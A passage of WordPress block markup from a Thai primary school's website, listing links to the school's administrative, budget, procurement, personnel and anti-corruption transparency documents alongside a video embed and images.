{\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"level\":4} -->\n<h4 class=\"wp-block-heading\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h4>\n<!-- /wp:heading -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button 